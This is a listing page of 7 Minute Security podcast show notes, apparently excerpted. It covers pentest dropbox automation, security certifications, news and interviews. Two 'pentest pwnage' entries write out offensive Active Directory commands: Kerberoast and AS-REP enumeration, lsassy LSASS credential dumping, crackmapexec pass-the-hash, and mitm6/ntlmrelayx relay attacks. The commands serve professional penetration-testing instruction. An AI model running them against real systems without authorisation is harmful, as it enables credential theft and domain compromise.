7 Minute Security

Today we continue the series on eating your own security dog food! Specifically, we talk about: Keeping a log and procedure for sanitizing systems Keeping a log and procedure for provisioning systems A big "gotcha" to be aware of when using Windows system dropboxes - make sure your Windows user account doesn't expire, because Splashtop doesn't have any way to update it! To prevent this, set the account not to expire: wmic useraccount where "Name='LocalAdminAccount'" set PasswordExpires=false If you want more tips on building pentest dropboxes, check out this series Oh, and today's song that I sang obnoxiously is If I Were a Dog.

Hey everybody! I stayed in a hotel for the first time in over a year and boy oh boy...I hope I didn't get COVID from the bedsheets! Anyhow, on that journey I thought of some things that I think will help your business on the marketing/project management/sales side to be more successful and less annoying. DISCLAIMER: I have no formal training in these areas, but I've been on both sides of the table for a number of years, and I think I'm getting a better idea of what clients do and don't like during the sales process. These things include: Reduce layers of people complexity - don't have 17 of your people on the client intro/pitch call and then ghost them once they actually want to buy something! Keep project management just complicated enough - I like project management tools and spreadsheet task-trackers like Smartsheet but I'm trying to let the client lead as far as how much detail they need when tracking their projects. By default, we create a document with a high level map of project milestones, timelin

Welp, I need another security certification like I needed a bunch to the retinas, but even after all the fun (and pain) of CRTP I couldn't help but sign up for the maiden voyage of Attacking and Defending Azure AD Cloud - a.k.a. CARTP. This cert comes to us from our friends over at Pentester Academy, and is all about pwning things in Azure AD which is mostly new ground for me. I this episode I talk about some of the TTPs covered in week 1 of this course, as well as: Likes: Courses offered on Saturday (I'm usually pooped for these sessions, but it's easier than taking time during the work week) Student portal - and especially the student guide! - is more polished, easy to read, and easy to copy/paste from. Dislikes: On Saturdays I'm a sleepy Brian. :-) I still wish the course was designed such that we would go through various hands-on-keyboard exercises with the instructor, not just watch. Use of Discord as main comms channel - it causes anxiety for me...too many blips and bloops and blurps with al

Hey friends!  Today Joe "The Machine" Skeen (a.k.a. Gh0sthax) and I talk about some of our favorite news stories, including: FBI removes hacker back doors NSA: 5 security bugs under active nation-state cyberattack Ubiquiti is accused of covering up a ‘catastrophic’ data breach — and it’s not denying it.  On a side note, enjoy our podcast about how we lost our love for Ubiquiti a while back: 7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean Codecov users warned after backdoor discovered in devops tool

Today our friend Christopher Fielder of Arctic Wolf joins us on the show again (check out his first appearance in episode #444 - this time to talk about the security journey, and how to start out in your "security diapers" and mature towards a stronger infosec program. Specifically, we talk about: When the company has one person in charge of IT/security, how can you start taking security seriously without burning this person out? First, it's probably a good idea to take note of what you have as far as people, tools and technology to help you meet your security goals. Early in this process, you should inventory what you have (see CIS controls) so you know what you need to protect. A few tools to help you get started: Nmap Rumble LanSweeper Witnessme As you go about any phase of your security journey, don't ever think "I'm good, I'm secure!" Quarterly/yearly vulnerability scans just won't cut it in today's threat landscape - especially your external network. Consider scanning it nightly to catch show-

In the last two episodes of this series (#449 and #450) we've been diving into how to not only speed up the process of spinning up a DIY pentest dropbox, but how to automate nearly the entire build process! In today's episode we talk specifically about how to streamline the Windows 10 build process. As previously mentioned, this article is awesome for creating a core Win 10 answer file that will format C:, setup a local admin, login once to the configured desktop and then do whatever things you want it to do. Personally, I like having a single batch file get fired off that: Sets the timezone with tzutil /s "Central Standard Time" Stops the VM from falling asleep with powercfg.exe -change -standby-timeout-ac 0 Grabs and runs a PS file that does a ton of downloading and unzipping of files with: invoke-webrequest https://somesite/somefile.zip -outfile c:\somewhere\somefile.zip expand-archive c:\somewhere\somefile.zip -destinationpath "c:\somewhere\extracted\" Installs Windows updates with: Install-

Today we talk through our first engagement using Hak5 Key Croc to steal and exfil data. In the past, my internal monologue when a new Hak5 toy is released sounds like this: "I certainly don't need another Hak5 doo-dad! The last one didn't ever work that great, and ended up in a drawer full of past Hak5 doo-dads that didn't work that great." "Whaaaaat? A new cool and hip video for the INSERT_CATCHY_HAK5_TOOL_NAME is out? Pffft. I don't need that." 5 seconds go by... "Well it's just $100, shut up and take my money!" "It came in the mail today! It has a cool envelope and everything!" "Hrm, I followed the quick start video and 3 of the 10 steps don't work for me. I'll hit the forums. Huh, everybody seems to be having this problem. 5 days go by... "Neat! With a little help from SassyGal67 and StarWarsFreak_XXL on the forums, I hacked together my own fix for these issues. Now the core functionality of the device works, but the GUI is totally broken and you have to factory reset it with every use.

OK I probably say this every time, but I'm gonna say it again: this tale of pwnage is my one of my favs - and not because of the tools/tradecraft, but because of why the company needed our help in the first place. I think I'd file this under the category of "rescue and recovery mission" more than a pentest, but it was a total blast. I also cover a few tangents, including how COVID shot #2 gave me nightmares about leprechauns and indirectly caused me to de-pants in front of a large Webinar audience.

Hey friends! Warning: this is not a "typical" 7MS episode where we try hard to deliver some level of security value. Instead, today is a big, fat, crybaby, first-world problems whine-fest about how I used to love my UniFi gear for many years, but then a few weeks ago I hit unhealthy levels of rage while working with it...and subsequently completely ripped it all out of the wall and threw it in a plastic bin. Let me say it one more time: if you don't like rants of rage, skip this episode and we'll see you next week!. If you want to hang in for this clown show, you'll be treated to some of the following highlights: How I did not pirate Boson NetSim How I fell in love with the Edge Router X as an up-and-coming network guru The schedule isn't up, but I'm speaking at Secure360 this year! My shiny new Dream Machine had a really fun issue where one morning Internet service was dead (even though config hadn't changed in weeks), and restoring the SAME config over the RUNNING config fixed the issue. Whaaahhhh?

Happy mid-March! Our good pal Gh0sthax joins us today for another hot dish of cyber news! Stories include: Microsoft Exchange cyber attack - Hacker News has a nice what we know so far story, but things have evolved really fast, so make sure you check Microsoft's primary advisory, the script to run on local servers and newer updates such as the recent one-click remediation for unsupported Exchange versions SonicWall zero day - yuck, looks like the SonicWall troubles we talked about recently were a true zero day. In contrast to the Exchange story, it looks like SonicWall's official response offers (frighteningly?) little by way of logs and forensics to tell if you were truly popped. Either way, be sure to patch! Hackers attempt to contaminate Florida town's water supply - the story itself is interesting, but the way it got picked up by some outlets seems to send the message of "TeamViewer = bad" but we think the true lessons learned here are: Out of date and/or unsupported OS = bad Weak credentials = ba

Today we're super excited to share a featured interview with Tanya Janca of WeHackPurple! Tanya has been in software development from the moment she was of legal age to work in Canada - beginning by working with some huge companies (Nokia/Adobe) before falling in love with application security and eventually starting a company of her own.  Gh0sthax and I sat down with Tanya over Zoom to discuss: How to overcome your fears and present at conferences, write blog posts and even start your own company! How to deal with online jackwagons who troll you online at conferences The importance of finding a mentor and mentoring others Also, here are a bunch of handy links and hashtags Tanya shares throughout the interview: Bob and Alice Learn Application Security - Tanya's book, available on Amazon Women of Security (WoSEC) We Hack Purple Podcast - weekly podcast with a diverse range of guests from all walks of infosec life We Hack Purple Community - "a Canadian company dedicated to helping anyone and everyone cre

Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence: Get a cmd.exe spun up in the context of your AD user account: runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe" Then get some important info in PowerView: Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win! Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win! Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access! Once you know where you have local admin access, lsassy is your friend: lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server Did you get an admin's NTLM hash from this dump? Then do this: crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED (Pwn3d!) FTW!  

Hello friends!  Today, Joe (Gh0sthax) and I complete our series on CRTP - Certified Red Team Professional - a really awesome pentesting training and exam based squarely on Microsoft tools and tradecraft.  Specifically, Joe and I talk about: We don't think the training/exam is for beginners, despite how its advertised Both the lab PDF and PowerPoint have their own quirks - which may ultimately be teaching us not to be copy-and-paste jockeys, and instead build our own study guides and cheat sheets Don't let the training give you the idea that most pentests have a super fast escalation path to DA (ok yes sometimes they do, but usually we spend a LOT of hours working on escalation!) Watch the walkthrough videos.  We repeat: WATCH THE WALKTHROUGH VIDEOS! Although not required, we highly recommend capturing all the flags laid out for you in the lab environment Know how to privesc - using multiple tools/methods It would be to your advantage to understand how to view/manipulate Active directory information in multip

Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because: I got to use some of my new CRTP skills! Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users: Get-DomainUser -PreauthNotRequired Check for misconfigured LAPS installs with Get-LAPSPasswords! The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn + ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective! When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workst

Happy almost-mid-February! Today Gh0sthax cooked up some great news stories for us to chew on, including: Sudo bug gives root access to mass numbers of Linux systems! What the heck is hammering with GameStop stock? - this tweet does a great job of explaining it in plain English Solarwinds continues to be a gift that keeps on giving malware-laced gifts that people don't want Sonicwall was hacked using zero days in its own products. After recording this news segment, Sonicwall issued an updated statement on the situation

Today's featured interview is with Marcello Salvati of Black Hills Information Security. Marcello is a.k.a. byt3bl33d3r, and known for his many contributions to the security community. We here at 7MS first became familiar with his work after using CrackMapExec on our penetration tests, and today we sat down with Marcello to discuss: Brian's Chris Farley moment with Marcello Marcello's infosec origin story CrackMapExec, how it came to be, how it was named, and what's coming in the new version of CME Marcello's decision to create Porchetta Industries as a community to provide "support to open source infosec/hacking tool developers and helps them succeed with their own Github sponsorships." Marcello welcomes you to follow Porchetta Industries on Twitter and Discord. What does Marcello do when he's not pentesting and coding? And does he ever get tired of pentesting and coding? What the heck is Nim and why is Marcello so excited about OffensiveNim?

Hey everyone! Hope you're having a great week. Today Gh0sthax and I do a brain dump and recap of a cool (and mind-exploding) course we took last week called Enterprise Attacker Emulation and C2 Implant Development. In the tangent department, we also touch a bit on: The Fargo TV series Our upcoming interview with Marcello (a.k.a. byt3bl33d3r) from BHIS This Key and Peele sketch I just took my CRTP exam, which we've talked about a lot in the past 7MS is trying to up its pentest game by learning how to write beacons/implants. One project that's really cool in this respect is from MrUn1k0d3r

Today we talk about a cool product called Deep Freeze, which, as its name implies, can "freeze" your computer in a known/good/frozen state. Then you can do whatever the flip you want to the machine (install icky things, tamper with C:\windows, pack your browser full of shady plugins, and more!), and then just reboot to restore! Note: this is not a sponsored episode, but will probably sound like one because I really dig this product and think you might too :-)

Hey friends! We're continuing our series on pentest dropbox building - specifically playing off last week's episode where we started talking about automating the OS builds that go on our dropboxes. Today we'll zoom in a little closer and talk about some of the specific scripting we do to get a Windows 2019 Active Directory Domain Controller installed and updated so that it's ready to electronically punch in the face with some of your mad pentesting skills! Specifically, we talk about these awesome commands: tzutil /s "Central Standard Time" - this is handy to set the time zone of your server build powercfg.exe -change -standby-timeout-ac 0 will stop your VM from falling asleep Invoke-WebRequest "https://somesite/somefile.file" -OutFile "c:\some\path\somefile.file" is awesome for quickly downloading files you need. Couple it with Expand-Archive "C:\some\path\some.zip" "c:\path\to\where\you\want\to\extract\the\zip" to make auto-provisioning your toolkit even faster! Don't like it that Server Manager loves to r

Happy new year! This episode continues our series on DIY pentest dropboxes with a focus on automation - specifically as it relates to automating the build of Windows 10, Windows Server 2019, Kali and Ubuntu VMs. Here's the resources I talk about in more detail on today's episode that helps make the automagic happen: Windows VMs This article from Windowscentral.com does a great job of walking you through building a Windows 10 unattended install. A key piece of the automation is the autounattend.xml file, which you can somewhat automatically build here, but I think you'll want to install the Windows System Image Manager to really get in the tech weeds and fully tweak that answer file. The handy AnyBurn utility will help you make ISOs out of your Windows 10 / Server 2019 customized builds. Ubuntu VMs I set out to build a Ubuntu 18.x box because Splashtop only supports a few Linux builds. I found a freakin' sweet project called Linux unattended installation that helps you build the preseed.cfg file (kind of like